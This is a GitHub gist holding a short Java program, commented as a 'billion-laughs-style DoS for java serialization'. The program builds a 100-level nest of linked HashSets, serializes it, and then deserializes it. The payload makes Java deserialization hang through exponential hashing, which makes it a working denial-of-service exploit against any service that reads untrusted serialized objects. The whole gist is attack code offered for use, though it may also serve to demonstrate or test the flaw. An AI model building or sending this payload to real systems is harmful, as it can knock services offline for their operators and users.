Create a gist now

Instantly share code, notes, and snippets.

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;
// billion-laughs-style DoS for java serialization
public class SerialDOS {
public static void main(String[] args) throws Exception {
deserialize(payload());
}
static Object deserialize(byte[] bytes) throws Exception {
return new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject();
}
static byte[] payload() throws IOException {
Set root = new HashSet();
Set s1 = root;
Set s2 = new HashSet();
for (int i = 0; i < 100; i++) {
Set t1 = new HashSet();
Set t2 = new HashSet();
t1.add("foo"); // make it not equal to t2
s1.add(t1);
s1.add(t2);
s2.add(t1);
s2.add(t2);
s1 = t1;
s2 = t2;
}
return serialize(root);
}
static byte[] serialize(Object o) throws IOException {
ByteArrayOutputStream ba = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(ba);
oos.writeObject(o);
oos.close();
return ba.toByteArray();
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment